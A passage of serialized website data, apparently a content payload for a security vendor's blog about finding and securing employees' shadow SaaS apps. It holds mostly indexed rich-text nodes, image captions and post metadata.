data":312006,"content":312007},{},[312008,312017],{"nodeType":254,"data":312009,"content":312010},{},[312011],{"nodeType":178,"data":312012,"content":312013},{},[312014],{"nodeType":173,"value":300500,"marks":312015,"data":312016},[],{},{"nodeType":254,"data":312018,"content":312019},{},[312020],{"nodeType":178,"data":312021,"content":312022},{},[312023],{"nodeType":173,"value":300510,"marks":312024,"data":312025},[],{},{"nodeType":254,"data":312027,"content":312028},{},[312029,312035],{"nodeType":178,"data":312030,"content":312031},{},[312032],{"nodeType":173,"value":308030,"marks":312033,"data":312034},[],{},{"nodeType":250,"data":312036,"content":312037},{},[312038,312047,312056,312065,312074],{"nodeType":254,"data":312039,"content":312040},{},[312041],{"nodeType":178,"data":312042,"content":312043},{},[312044],{"nodeType":173,"value":300537,"marks":312045,"data":312046},[],{},{"nodeType":254,"data":312048,"content":312049},{},[312050],{"nodeType":178,"data":312051,"content":312052},{},[312053],{"nodeType":173,"value":300547,"marks":312054,"data":312055},[],{},{"nodeType":254,"data":312057,"content":312058},{},[312059],{"nodeType":178,"data":312060,"content":312061},{},[312062],{"nodeType":173,"value":300557,"marks":312063,"data":312064},[],{},{"nodeType":254,"data":312066,"content":312067},{},[312068],{"nodeType":178,"data":312069,"content":312070},{},[312071],{"nodeType":173,"value":300567,"marks":312072,"data":312073},[],{},{"nodeType":254,"data":312075,"content":312076},{},[312077],{"nodeType":178,"data":312078,"content":312079},{},[312080],{"nodeType":173,"value":300577,"marks":312081,"data":312082},[],{},{"nodeType":254,"data":312084,"content":312085},{},[312086],{"nodeType":178,"data":312087,"content":312088},{},[312089],{"nodeType":173,"value":308088,"marks":312090,"data":312091},[],{},{"nodeType":178,"data":312093,"content":312094},{},[312095],{"nodeType":173,"value":308095,"marks":312096,"data":312097},[],{},{"nodeType":178,"data":312099,"content":312100},{},[312101],{"nodeType":173,"value":308102,"marks":312102,"data":312103},[],{},{"nodeType":178,"data":312105,"content":312106},{},[312107],{"nodeType":173,"value":308109,"marks":312108,"data":312109},[],{},{"nodeType":178,"data":312111,"content":312112},{},[312113,312116],{"nodeType":173,"value":308116,"marks":312114,"data":312115},[],{},{"nodeType":173,"value":308120,"marks":312117,"data":312120},[312118,312119],{"type":370},{"type":1646},{},{"nodeType":178,"data":312122,"content":312123},{},[312124],{"nodeType":173,"value":308129,"marks":312125,"data":312126},[],{},{"nodeType":235,"data":312128,"content":312129},{},[312130],{"nodeType":173,"value":308136,"marks":312131,"data":312132},[],{},{"nodeType":178,"data":312134,"content":312135},{},[312136],{"nodeType":173,"value":308143,"marks":312137,"data":312138},[],{},{"nodeType":178,"data":312140,"content":312141},{},[312142],{"nodeType":173,"value":308150,"marks":312143,"data":312144},[],{},{"nodeType":312,"data":312146,"content":312149},{"target":312147},{"sys":312148},{"id":308157,"type":317,"linkType":318},[],{"nodeType":178,"data":312151,"content":312152},{},[312153],{"nodeType":173,"value":308163,"marks":312154,"data":312155},[],{},{"nodeType":169,"data":312157,"content":312158},{},[312159],{"nodeType":173,"value":308170,"marks":312160,"data":312161},[],{},{"nodeType":178,"data":312163,"content":312164},{},[312165],{"nodeType":173,"value":308177,"marks":312166,"data":312167},[],{},{"nodeType":312,"data":312169,"content":312172},{"target":312170},{"sys":312171},{"id":284133,"type":317,"linkType":318},[],{"nodeType":178,"data":312174,"content":312175},{},[312176],{"nodeType":173,"value":308189,"marks":312177,"data":312179},[312178],{"type":370},{},{"nodeType":178,"data":312181,"content":312182},{},[312183],{"nodeType":173,"value":308197,"marks":312184,"data":312185},[],{},{"nodeType":178,"data":312187,"content":312188},{},[312189],{"nodeType":173,"value":308204,"marks":312190,"data":312191},[],{},{"nodeType":235,"data":312193,"content":312194},{},[312195],{"nodeType":173,"value":308211,"marks":312196,"data":312197},[],{},{"nodeType":178,"data":312199,"content":312200},{},[312201],{"nodeType":173,"value":308218,"marks":312202,"data":312203},[],{},{"nodeType":178,"data":312205,"content":312206},{},[312207],{"nodeType":173,"value":308225,"marks":312208,"data":312209},[],{},{"nodeType":178,"data":312211,"content":312212},{},[312213],{"nodeType":173,"value":308232,"marks":312214,"data":312215},[],{},{"nodeType":312,"data":312217,"content":312220},{"target":312218},{"sys":312219},{"id":308239,"type":317,"linkType":318},[],{"nodeType":178,"data":312222,"content":312223},{},[312224],{"nodeType":173,"value":308245,"marks":312225,"data":312226},[],{},{"nodeType":178,"data":312228,"content":312229},{},[312230],{"nodeType":173,"value":308252,"marks":312231,"data":312232},[],{},{"nodeType":169,"data":312234,"content":312235},{},[312236],{"nodeType":173,"value":308259,"marks":312237,"data":312238},[],{},{"nodeType":178,"data":312240,"content":312241},{},[312242],{"nodeType":173,"value":308266,"marks":312243,"data":312244},[],{},{"nodeType":312,"data":312246,"content":312249},{"target":312247},{"sys":312248},{"id":283612,"type":317,"linkType":318},[],{"nodeType":178,"data":312251,"content":312252},{},[312253],{"nodeType":173,"value":308278,"marks":312254,"data":312255},[],{},{"nodeType":250,"data":312257,"content":312258},{},[312259,312268,312277,312286],{"nodeType":254,"data":312260,"content":312261},{},[312262],{"nodeType":178,"data":312263,"content":312264},{},[312265],{"nodeType":173,"value":300726,"marks":312266,"data":312267},[],{},{"nodeType":254,"data":312269,"content":312270},{},[312271],{"nodeType":178,"data":312272,"content":312273},{},[312274],{"nodeType":173,"value":300736,"marks":312275,"data":312276},[],{},{"nodeType":254,"data":312278,"content":312279},{},[312280],{"nodeType":178,"data":312281,"content":312282},{},[312283],{"nodeType":173,"value":300746,"marks":312284,"data":312285},[],{},{"nodeType":254,"data":312287,"content":312288},{},[312289],{"nodeType":178,"data":312290,"content":312291},{},[312292],{"nodeType":173,"value":300756,"marks":312293,"data":312294},[],{},{"nodeType":312,"data":312296,"content":312299},{"target":312297},{"sys":312298},{"id":300352,"type":317,"linkType":318},[],{"nodeType":178,"data":312301,"content":312302},{},[312303],{"nodeType":173,"value":308329,"marks":312304,"data":312305},[],{},{"nodeType":250,"data":312307,"content":312308},{},[312309,312318],{"nodeType":254,"data":312310,"content":312311},{},[312312],{"nodeType":178,"data":312313,"content":312314},{},[312315],{"nodeType":173,"value":308342,"marks":312316,"data":312317},[],{},{"nodeType":254,"data":312319,"content":312320},{},[312321],{"nodeType":178,"data":312322,"content":312323},{},[312324],{"nodeType":173,"value":308352,"marks":312325,"data":312326},[],{},{"nodeType":178,"data":312328,"content":312329},{},[312330],{"nodeType":173,"value":308359,"marks":312331,"data":312332},[],{},{"nodeType":250,"data":312334,"content":312335},{},[312336,312345],{"nodeType":254,"data":312337,"content":312338},{},[312339],{"nodeType":178,"data":312340,"content":312341},{},[312342],{"nodeType":173,"value":308372,"marks":312343,"data":312344},[],{},{"nodeType":254,"data":312346,"content":312347},{},[312348],{"nodeType":178,"data":312349,"content":312350},{},[312351],{"nodeType":173,"value":308382,"marks":312352,"data":312353},[],{},{"nodeType":178,"data":312355,"content":312356},{},[312357],{"nodeType":173,"value":308389,"marks":312358,"data":312359},[],{},{"nodeType":178,"data":312361,"content":312362},{},[312363],{"nodeType":173,"value":308396,"marks":312364,"data":312365},[],{},{"nodeType":235,"data":312367,"content":312368},{},[312369],{"nodeType":173,"value":308403,"marks":312370,"data":312371},[],{},{"nodeType":178,"data":312373,"content":312374},{},[312375],{"nodeType":173,"value":308410,"marks":312376,"data":312377},[],{},{"nodeType":178,"data":312379,"content":312380},{},[312381],{"nodeType":173,"value":308417,"marks":312382,"data":312383},[],{},{"nodeType":250,"data":312385,"content":312386},{},[312387,312406,312425,312444,312463],{"nodeType":254,"data":312388,"content":312389},{},[312390],{"nodeType":178,"data":312391,"content":312392},{},[312393,312396,312403],{"nodeType":173,"value":308430,"marks":312394,"data":312395},[],{},{"nodeType":186,"data":312397,"content":312398},{"uri":308435},[312399],{"nodeType":173,"value":308438,"marks":312400,"data":312402},[312401],{"type":194},{},{"nodeType":173,"value":37,"marks":312404,"data":312405},[],{},{"nodeType":254,"data":312407,"content":312408},{},[312409],{"nodeType":178,"data":312410,"content":312411},{},[312412,312415,312422],{"nodeType":173,"value":308430,"marks":312413,"data":312414},[],{},{"nodeType":186,"data":312416,"content":312417},{"uri":308456},[312418],{"nodeType":173,"value":308459,"marks":312419,"data":312421},[312420],{"type":194},{},{"nodeType":173,"value":37,"marks":312423,"data":312424},[],{},{"nodeType":254,"data":312426,"content":312427},{},[312428],{"nodeType":178,"data":312429,"content":312430},{},[312431,312434,312441],{"nodeType":173,"value":308473,"marks":312432,"data":312433},[],{},{"nodeType":186,"data":312435,"content":312436},{"uri":308478},[312437],{"nodeType":173,"value":308481,"marks":312438,"data":312440},[312439],{"type":194},{},{"nodeType":173,"value":37,"marks":312442,"data":312443},[],{},{"nodeType":254,"data":312445,"content":312446},{},[312447],{"nodeType":178,"data":312448,"content":312449},{},[312450,312453,312460],{"nodeType":173,"value":308430,"marks":312451,"data":312452},[],{},{"nodeType":186,"data":312454,"content":312455},{"uri":308499},[312456],{"nodeType":173,"value":308502,"marks":312457,"data":312459},[312458],{"type":194},{},{"nodeType":173,"value":37,"marks":312461,"data":312462},[],{},{"nodeType":254,"data":312464,"content":312465},{},[312466],{"nodeType":178,"data":312467,"content":312468},{},[312469,312472,312479],{"nodeType":173,"value":308430,"marks":312470,"data":312471},[],{},{"nodeType":186,"data":312473,"content":312474},{"uri":308520},[312475],{"nodeType":173,"value":308523,"marks":312476,"data":312478},[312477],{"type":194},{},{"nodeType":173,"value":37,"marks":312480,"data":312481},[],{},{"nodeType":312,"data":312483,"content":312486},{"target":312484},{"sys":312485},{"id":285904,"type":317,"linkType":318},[],{"nodeType":178,"data":312488,"content":312489},{},[312490],{"nodeType":173,"value":308539,"marks":312491,"data":312492},[],{},{"nodeType":178,"data":312494,"content":312495},{},[312496],{"nodeType":173,"value":308546,"marks":312497,"data":312500},[312498,312499],{"type":370},{"type":1646},{},{"nodeType":235,"data":312502,"content":312503},{},[312504],{"nodeType":173,"value":308555,"marks":312505,"data":312506},[],{},{"nodeType":178,"data":312508,"content":312509},{},[312510],{"nodeType":173,"value":308562,"marks":312511,"data":312512},[],{},{"nodeType":178,"data":312514,"content":312515},{},[312516],{"nodeType":173,"value":308569,"marks":312517,"data":312518},[],{},{"nodeType":178,"data":312520,"content":312521},{},[312522],{"nodeType":173,"value":308576,"marks":312523,"data":312524},[],{},{"nodeType":178,"data":312526,"content":312527},{},[312528],{"nodeType":173,"value":308583,"marks":312529,"data":312530},[],{},{"nodeType":235,"data":312532,"content":312533},{},[312534],{"nodeType":173,"value":308590,"marks":312535,"data":312536},[],{},{"nodeType":312,"data":312538,"content":312541},{"target":312539},{"sys":312540},{"id":286240,"type":317,"linkType":318},[],{"nodeType":178,"data":312543,"content":312544},{},[312545],{"nodeType":173,"value":308602,"marks":312546,"data":312547},[],{},{"nodeType":178,"data":312549,"content":312550},{},[312551],{"nodeType":173,"value":308609,"marks":312552,"data":312553},[],{},{"nodeType":178,"data":312555,"content":312556},{},[312557,312560,312567],{"nodeType":173,"value":308616,"marks":312558,"data":312559},[],{},{"nodeType":186,"data":312561,"content":312562},{"uri":27492},[312563],{"nodeType":173,"value":4475,"marks":312564,"data":312566},[312565],{"type":194},{},{"nodeType":173,"value":308627,"marks":312568,"data":312569},[],{},{"nodeType":235,"data":312571,"content":312572},{},[312573],{"nodeType":173,"value":308634,"marks":312574,"data":312575},[],{},{"nodeType":178,"data":312577,"content":312578},{},[312579],{"nodeType":173,"value":308641,"marks":312580,"data":312581},[],{},{"nodeType":178,"data":312583,"content":312584},{},[312585],{"nodeType":173,"value":308648,"marks":312586,"data":312587},[],{},{"nodeType":312,"data":312589,"content":312592},{"target":312590},{"sys":312591},{"id":286302,"type":317,"linkType":318},[],{"nodeType":178,"data":312594,"content":312595},{},[312596],{"nodeType":173,"value":308660,"marks":312597,"data":312598},[],{},{"nodeType":178,"data":312600,"content":312601},{},[312602],{"nodeType":173,"value":308667,"marks":312603,"data":312604},[],{},{"nodeType":178,"data":312606,"content":312607},{},[312608],{"nodeType":173,"value":286343,"marks":312609,"data":312610},[],{},{"nodeType":250,"data":312612,"content":312613},{},[312614,312623,312632],{"nodeType":254,"data":312615,"content":312616},{},[312617],{"nodeType":178,"data":312618,"content":312619},{},[312620],{"nodeType":173,"value":308686,"marks":312621,"data":312622},[],{},{"nodeType":254,"data":312624,"content":312625},{},[312626],{"nodeType":178,"data":312627,"content":312628},{},[312629],{"nodeType":173,"value":308696,"marks":312630,"data":312631},[],{},{"nodeType":254,"data":312633,"content":312634},{},[312635],{"nodeType":178,"data":312636,"content":312637},{},[312638],{"nodeType":173,"value":286386,"marks":312639,"data":312640},[],{},{"nodeType":178,"data":312642,"content":312643},{},[312644],{"nodeType":173,"value":308712,"marks":312645,"data":312646},[],{},{"nodeType":169,"data":312648,"content":312649},{},[312650],{"nodeType":173,"value":308719,"marks":312651,"data":312652},[],{},{"nodeType":178,"data":312654,"content":312655},{},[312656],{"nodeType":173,"value":308726,"marks":312657,"data":312658},[],{},{"nodeType":178,"data":312660,"content":312661},{},[312662],{"nodeType":173,"value":308733,"marks":312663,"data":312664},[],{},{"nodeType":178,"data":312666,"content":312667},{},[312668],{"nodeType":173,"value":308740,"marks":312669,"data":312670},[],{},{"nodeType":178,"data":312672,"content":312673},{},[312674],{"nodeType":173,"value":308747,"marks":312675,"data":312676},[],{},{"nodeType":169,"data":312678,"content":312679},{},[312680],{"nodeType":173,"value":308754,"marks":312681,"data":312682},[],{},{"nodeType":178,"data":312684,"content":312685},{},[312686],{"nodeType":173,"value":308761,"marks":312687,"data":312688},[],{},{"nodeType":178,"data":312690,"content":312691},{},[312692],{"nodeType":173,"value":308768,"marks":312693,"data":312694},[],{},{"nodeType":178,"data":312696,"content":312697},{},[312698],{"nodeType":173,"value":308775,"marks":312699,"data":312700},[],{},{"nodeType":250,"data":312702,"content":312703},{},[312704,312713,312722,312731],{"nodeType":254,"data":312705,"content":312706},{},[312707],{"nodeType":178,"data":312708,"content":312709},{},[312710],{"nodeType":173,"value":308788,"marks":312711,"data":312712},[],{},{"nodeType":254,"data":312714,"content":312715},{},[312716],{"nodeType":178,"data":312717,"content":312718},{},[312719],{"nodeType":173,"value":308798,"marks":312720,"data":312721},[],{},{"nodeType":254,"data":312723,"content":312724},{},[312725],{"nodeType":178,"data":312726,"content":312727},{},[312728],{"nodeType":173,"value":308808,"marks":312729,"data":312730},[],{},{"nodeType":254,"data":312732,"content":312733},{},[312734],{"nodeType":178,"data":312735,"content":312736},{},[312737],{"nodeType":173,"value":308818,"marks":312738,"data":312739},[],{},{"nodeType":178,"data":312741,"content":312742},{},[312743],{"nodeType":173,"value":308825,"marks":312744,"data":312745},[],{},{"nodeType":312,"data":312747,"content":312750},{"target":312748},{"sys":312749},{"id":308832,"type":317,"linkType":318},[],{"nodeType":178,"data":312752,"content":312753},{},[312754,312757,312766],{"nodeType":173,"value":308838,"marks":312755,"data":312756},[],{},{"nodeType":1698,"data":312758,"content":312761},{"target":312759},{"sys":312760},{"id":282056,"type":317,"linkType":318},[312762],{"nodeType":173,"value":308847,"marks":312763,"data":312765},[312764],{"type":194},{},{"nodeType":173,"value":308852,"marks":312767,"data":312768},[],{},{"nodeType":235,"data":312770,"content":312771},{},[312772],{"nodeType":173,"value":308859,"marks":312773,"data":312774},[],{},{"nodeType":178,"data":312776,"content":312777},{},[312778],{"nodeType":173,"value":308866,"marks":312779,"data":312780},[],{},{"nodeType":178,"data":312782,"content":312783},{},[312784],{"nodeType":173,"value":308873,"marks":312785,"data":312786},[],{},{"nodeType":235,"data":312788,"content":312789},{},[312790],{"nodeType":173,"value":308880,"marks":312791,"data":312792},[],{},{"nodeType":178,"data":312794,"content":312795},{},[312796],{"nodeType":173,"value":308887,"marks":312797,"data":312798},[],{},{"nodeType":178,"data":312800,"content":312801},{},[312802],{"nodeType":173,"value":308894,"marks":312803,"data":312804},[],{},{"nodeType":235,"data":312806,"content":312807},{},[312808],{"nodeType":173,"value":308901,"marks":312809,"data":312810},[],{},{"nodeType":178,"data":312812,"content":312813},{},[312814],{"nodeType":173,"value":308908,"marks":312815,"data":312816},[],{},{"nodeType":178,"data":312818,"content":312819},{},[312820],{"nodeType":173,"value":308915,"marks":312821,"data":312822},[],{},{"nodeType":178,"data":312824,"content":312825},{},[312826],{"nodeType":173,"value":308922,"marks":312827,"data":312828},[],{},{"nodeType":235,"data":312830,"content":312831},{},[312832],{"nodeType":173,"value":308929,"marks":312833,"data":312834},[],{},{"nodeType":178,"data":312836,"content":312837},{},[312838],{"nodeType":173,"value":308936,"marks":312839,"data":312840},[],{},{"nodeType":178,"data":312842,"content":312843},{},[312844],{"nodeType":173,"value":308943,"marks":312845,"data":312846},[],{},{"nodeType":246189,"data":312848,"content":312849},{},[312850,312866],{"nodeType":254,"data":312851,"content":312852},{},[312853],{"nodeType":178,"data":312854,"content":312855},{},[312856,312859,312863],{"nodeType":173,"value":308956,"marks":312857,"data":312858},[],{},{"nodeType":173,"value":308960,"marks":312860,"data":312862},[312861],{"type":370},{},{"nodeType":173,"value":308965,"marks":312864,"data":312865},[],{},{"nodeType":254,"data":312867,"content":312868},{},[312869],{"nodeType":178,"data":312870,"content":312871},{},[312872,312875,312879],{"nodeType":173,"value":308975,"marks":312873,"data":312874},[],{},{"nodeType":173,"value":308979,"marks":312876,"data":312878},[312877],{"type":370},{},{"nodeType":173,"value":308984,"marks":312880,"data":312881},[],{},{"nodeType":235,"data":312883,"content":312884},{},[312885],{"nodeType":173,"value":18538,"marks":312886,"data":312887},[],{},{"nodeType":178,"data":312889,"content":312890},{},[312891],{"nodeType":173,"value":308997,"marks":312892,"data":312893},[],{},{"nodeType":178,"data":312895,"content":312896},{},[312897,312900,312904],{"nodeType":173,"value":309004,"marks":312898,"data":312899},[],{},{"nodeType":173,"value":309008,"marks":312901,"data":312903},[312902],{"type":370},{},{"nodeType":173,"value":309013,"marks":312905,"data":312906},[],{},{"nodeType":178,"data":312908,"content":312909},{},[312910,312913,312917],{"nodeType":173,"value":309020,"marks":312911,"data":312912},[],{},{"nodeType":173,"value":309024,"marks":312914,"data":312916},[312915],{"type":370},{},{"nodeType":173,"value":309029,"marks":312918,"data":312919},[],{},{"nodeType":178,"data":312921,"content":312922},{},[312923],{"nodeType":173,"value":309036,"marks":312924,"data":312925},[],{},{"nodeType":178,"data":312927,"content":312928},{},[312929],{"nodeType":173,"value":309043,"marks":312930,"data":312931},[],{},{"nodeType":235,"data":312933,"content":312934},{},[312935],{"nodeType":173,"value":309050,"marks":312936,"data":312937},[],{},{"nodeType":178,"data":312939,"content":312940},{},[312941],{"nodeType":173,"value":309057,"marks":312942,"data":312943},[],{},{"nodeType":169,"data":312945,"content":312946},{},[312947],{"nodeType":173,"value":309064,"marks":312948,"data":312949},[],{},{"nodeType":178,"data":312951,"content":312952},{},[312953],{"nodeType":173,"value":273308,"marks":312954,"data":312955},[],{},{"nodeType":178,"data":312957,"content":312958},{},[312959],{"nodeType":173,"value":309077,"marks":312960,"data":312961},[],{},{"nodeType":235,"data":312963,"content":312964},{},[312965],{"nodeType":173,"value":309084,"marks":312966,"data":312967},[],{},{"nodeType":178,"data":312969,"content":312970},{},[312971],{"nodeType":173,"value":309091,"marks":312972,"data":312973},[],{},{"nodeType":312,"data":312975,"content":312978},{"target":312976},{"sys":312977},{"id":309098,"type":317,"linkType":318},[],{"nodeType":235,"data":312980,"content":312981},{},[312982],{"nodeType":173,"value":309104,"marks":312983,"data":312984},[],{},{"nodeType":178,"data":312986,"content":312987},{},[312988],{"nodeType":173,"value":309111,"marks":312989,"data":312990},[],{},{"nodeType":312,"data":312992,"content":312995},{"target":312993},{"sys":312994},{"id":274541,"type":317,"linkType":318},[],{"nodeType":235,"data":312997,"content":312998},{},[312999],{"nodeType":173,"value":309123,"marks":313000,"data":313001},[],{},{"nodeType":178,"data":313003,"content":313004},{},[313005],{"nodeType":173,"value":282355,"marks":313006,"data":313007},[],{},{"nodeType":178,"data":313009,"content":313010},{},[313011],{"nodeType":173,"value":309136,"marks":313012,"data":313013},[],{},{"nodeType":178,"data":313015,"content":313016},{},[313017],{"nodeType":173,"value":282399,"marks":313018,"data":313019},[],{},{"nodeType":178,"data":313021,"content":313022},{},[313023],{"nodeType":173,"value":309149,"marks":313024,"data":313027},[313025,313026],{"type":370},{"type":1646},{},{"nodeType":235,"data":313029,"content":313030},{},[313031],{"nodeType":173,"value":274547,"marks":313032,"data":313033},[],{},{"nodeType":178,"data":313035,"content":313036},{},[313037],{"nodeType":173,"value":309164,"marks":313038,"data":313039},[],{},{"nodeType":250,"data":313041,"content":313042},{},[313043,313052,313061,313070,313079,313088],{"nodeType":254,"data":313044,"content":313045},{},[313046],{"nodeType":178,"data":313047,"content":313048},{},[313049],{"nodeType":173,"value":273418,"marks":313050,"data":313051},[],{},{"nodeType":254,"data":313053,"content":313054},{},[313055],{"nodeType":178,"data":313056,"content":313057},{},[313058],{"nodeType":173,"value":282464,"marks":313059,"data":313060},[],{},{"nodeType":254,"data":313062,"content":313063},{},[313064],{"nodeType":178,"data":313065,"content":313066},{},[313067],{"nodeType":173,"value":273438,"marks":313068,"data":313069},[],{},{"nodeType":254,"data":313071,"content":313072},{},[313073],{"nodeType":178,"data":313074,"content":313075},{},[313076],{"nodeType":173,"value":282483,"marks":313077,"data":313078},[],{},{"nodeType":254,"data":313080,"content":313081},{},[313082],{"nodeType":178,"data":313083,"content":313084},{},[313085],{"nodeType":173,"value":273458,"marks":313086,"data":313087},[],{},{"nodeType":254,"data":313089,"content":313090},{},[313091],{"nodeType":178,"data":313092,"content":313093},{},[313094],{"nodeType":173,"value":282502,"marks":313095,"data":313096},[],{},{"nodeType":312,"data":313098,"content":313101},{"target":313099},{"sys":313100},{"id":282509,"type":317,"linkType":318},[],{"nodeType":178,"data":313103,"content":313104},{},[313105],{"nodeType":173,"value":309233,"marks":313106,"data":313107},[],{},{"nodeType":178,"data":313109,"content":313110},{},[313111],{"nodeType":173,"value":309240,"marks":313112,"data":313113},[],{},{"nodeType":312,"data":313115,"content":313118},{"target":313116},{"sys":313117},{"id":282536,"type":317,"linkType":318},[],{"nodeType":235,"data":313120,"content":313121},{},[313122],{"nodeType":173,"value":309252,"marks":313123,"data":313124},[],{},{"nodeType":178,"data":313126,"content":313127},{},[313128],{"nodeType":173,"value":309259,"marks":313129,"data":313130},[],{},{"nodeType":178,"data":313132,"content":313133},{},[313134],{"nodeType":173,"value":309266,"marks":313135,"data":313136},[],{},{"nodeType":312,"data":313138,"content":313141},{"target":313139},{"sys":313140},{"id":309273,"type":317,"linkType":318},[],{"nodeType":235,"data":313143,"content":313144},{},[313145,313148],{"nodeType":173,"value":309279,"marks":313146,"data":313147},[],{},{"nodeType":173,"value":273597,"marks":313149,"data":313151},[313150],{"type":1646},{},{"nodeType":178,"data":313153,"content":313154},{},[313155],{"nodeType":173,"value":309290,"marks":313156,"data":313157},[],{},{"entries":313159},{"inline":313160,"hyperlink":313161,"block":313166},[],[313162,313164],{"sys":313163,"__typename":1528,"title":281786,"slug":281789},{"id":280332},{"sys":313165,"__typename":1528,"title":298859,"slug":298860},{"id":282056},[313167,313170,313173,313180,313183,313189,313192,313195,313198,313201,313204,313212,313217,313220,313226,313232],{"sys":313168,"__typename":5345,"title":298886,"caption":298887,"layoutMode":112585,"file":313169},{"id":281011},{"url":298889,"width":298890,"height":296715},{"sys":313171,"__typename":5345,"title":300794,"caption":300794,"layoutMode":112585,"file":313172},{"id":281248},{"url":300796,"width":5358,"height":300797},{"sys":313174,"__typename":5345,"title":313175,"caption":313176,"layoutMode":112585,"file":313177},{"id":308157},"Focus on the new stuff PLG","By focusing on newly-tested/adopted apps, you have more sway with employees on their app choices.",{"url":313178,"width":296714,"height":313179},"https://images.ctfassets.net/y1cdw1ablpvd/3qFd7mDWRzdyySkgAOmr14/5d4fd61bb45b4ff8a8780a6ec543d493/image1.png",1100,{"sys":313181,"__typename":5345,"title":298907,"caption":298908,"layoutMode":112585,"file":313182},{"id":284133},{"url":298910,"width":103010,"height":107744},{"sys":313184,"__typename":5345,"title":313185,"caption":313186,"layoutMode":112585,"file":313187},{"id":308239},"False positives employee interaction","Interacting with employees about apps they're not even using burns goodwill and wastes everyones' time",{"url":313188,"width":266363,"height":96400},"https://images.ctfassets.net/y1cdw1ablpvd/5LRJyodNqCidY9UlUIY5Jw/ad795b2e44bff77f9d746e2ccb910f18/image2.png",{"sys":313190,"__typename":5345,"title":298893,"caption":118,"layoutMode":112585,"file":313191},{"id":283612},{"url":298895,"width":66767,"height":298896},{"sys":313193,"__typename":5345,"title":300800,"caption":300801,"layoutMode":112585,"file":313194},{"id":300352},{"url":300803,"width":300804,"height":300805},{"sys":313196,"__typename":5345,"title":286456,"caption":286457,"layoutMode":112585,"file":313197},{"id":285904},{"url":286459,"width":5358,"height":286460},{"sys":313199,"__typename":5345,"title":286469,"caption":286470,"layoutMode":112585,"file":313200},{"id":286240},{"url":286472,"width":60003,"height":286473},{"sys":313202,"__typename":5345,"title":286476,"caption":286477,"layoutMode":112585,"file":313203},{"id":286302},{"url":286479,"width":5358,"height":142414},{"sys":313205,"__typename":5345,"title":313206,"caption":313207,"layoutMode":112585,"file":313208},{"id":308832},"SaaS discovery data source comparison","Strengths and weaknesses for finding employee SaaS use via commonly-used discovery data sources ",{"url":313209,"width":313210,"height":313211},"https://images.ctfassets.net/y1cdw1ablpvd/7FRyXaw4o4baUqG1cta41n/57a9476e83daf0386600c5bb8d4e827b/Screenshot_2023-04-24_at_9.09.16_AM.png",1796,1010,{"sys":313213,"__typename":5345,"title":313214,"caption":313214,"layoutMode":112585,"file":313215},{"id":309098},"Push SaaS dashboard",{"url":313216,"width":5358,"height":274678},"https://images.ctfassets.net/y1cdw1ablpvd/OsnXflsAKGaZU9Dl4lUTA/a49ef3631a4c35d259950dd395abc662/image9.png",{"sys":313218,"__typename":5345,"title":274681,"caption":274682,"layoutMode":112585,"file":313219},{"id":274541},{"url":274684,"width":5358,"height":274678},{"sys":313221,"__typename":5345,"title":313222,"caption":313223,"layoutMode":112585,"file":313224},{"id":282509},"Push's account security dashboard","Push's account security dashboard shows you which accounts need attention",{"url":313225,"width":274691,"height":274692},"https://images.ctfassets.net/y1cdw1ablpvd/2LmWdqq57ZdIXHUSublBLK/eed71e0fa5c3039ae06f780c64057651/image4.png",{"sys":313227,"__typename":5345,"title":313228,"caption":313229,"layoutMode":112585,"file":313230},{"id":282536},"Slack message to employee about MFA","Slack message to employee about enabling MFA for their SaaS account",{"url":313231,"width":5358,"height":274678},"https://images.ctfassets.net/y1cdw1ablpvd/1vWInHTSFEwt2kTXj0SK1I/5312ff9147b78837a71e367c9a59492f/image11.png",{"sys":313233,"__typename":5345,"title":313234,"caption":313235,"layoutMode":112585,"file":313236},{"id":309273},"Dropbox signin guidance","Push browser extension helping an employee securely sign up for Dropbox",{"url":313237,"width":5358,"height":274678},"https://images.ctfassets.net/y1cdw1ablpvd/7aqfsVnZS2LP1ur6SUdc4h/fc4cfddfa625af478238bc9303c34cf1/image8.png","content:blog:protect-your-data-across-all-your-apps-even-the-ones-employees-use-without.json","blog/protect-your-data-across-all-your-apps-even-the-ones-employees-use-without.json","blog/protect-your-data-across-all-your-apps-even-the-ones-employees-use-without",{"_path":313242,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":313243,"ogImage":118,"summary":313245,"title":282544,"subtitle":118,"metaTitle":313256,"synopsis":282545,"hashTags":118,"publishedDate":282546,"slug":282547,"tagsCollection":313257,"relatedBlogPostsCollection":313263,"authorsCollection":314914,"content":314918,"_id":315613,"_type":5439,"_source":5440,"_file":315614,"_stem":315615,"_extension":5439},"/blog/3-steps-to-secure-your-data-across-shadow-saas-apps",{"id":281802,"publishedAt":313244},"2025-01-15T14:20:14.374Z",{"json":313246},{"data":313247,"content":313248,"nodeType":165},{},[313249],{"data":313250,"content":313251,"nodeType":178},{},[313252],{"data":313253,"marks":313254,"value":313255,"nodeType":173},{},[],"Attackers commonly target SaaS apps because they know employees sign up without running them past IT first. Learn how to adjust to secure your data.","Secure your data across shadow SaaS apps in 7 steps",{"items":313258},[313259,313261],{"sys":313260,"name":274157},{"id":274156},{"sys":313262,"name":26133},{"id":26132},{"items":313264},[313265,314533],{"__typename":1528,"sys":313266,"content":313267,"title":281786,"synopsis":281787,"hashTags":118,"publishedDate":281788,"slug":281789,"tagsCollection":314523,"authorsCollection":314529},{"id":280332},{"json":313268},{"nodeType":165,"data":313269,"content":313270},{},[313271,313277,313283,313289,313295,313301,313307,313313,313319,313358,313364,313370,313376,313382,313388,313393,313399,313405,313411,313418,313424,313430,313436,313442,313448,313454,313460,313476,313481,313487,313493,313503,313510,313516,313521,313527,313533,313538,313544,313552,313565,313586,313592,313598,313604,313610,313615,313621,313627,313633,313639,313645,313651,313667,313673,313679,313685,313691,313704,313734,313742,313748,313754,313760,313766,313772,313778,313784,313789,313795,313801,313807,313813,313819,313825,313841,313847,313852,313858,313879,313885,313891,313921,313927,313933,313939,313945,313957,313963,314023,314029,314035,314056,314061,314067,314073,314079,314109,314115,314456,314462,314478,314484,314492,314505,314511,314517],{"nodeType":169,"data":313272,"content":313273},{},[313274],{"nodeType":173,"value":258287,"marks":313275,"data":313276},[],{},{"nodeType":178,"data":313278,"content":313279},{},[313280],{"nodeType":173,"value":280347,"marks":313281,"data":313282},[],{},{"nodeType":178,"data":313284,"content":313285},{},[313286],{"nodeType":173,"value":280354,"marks":313287,"data":313288},[],{},{"nodeType":178,"data":313290,"content":313291},{},[313292],{"nodeType":173,"value":280361,"marks":313293,"data":313294},[],{},{"nodeType":178,"data":313296,"content":313297},{},[313298],{"nodeType":173,"value":280368,"marks":313299,"data":313300},[],{},{"nodeType":178,"data":313302,"content":313303},{},[313304],{"nodeType":173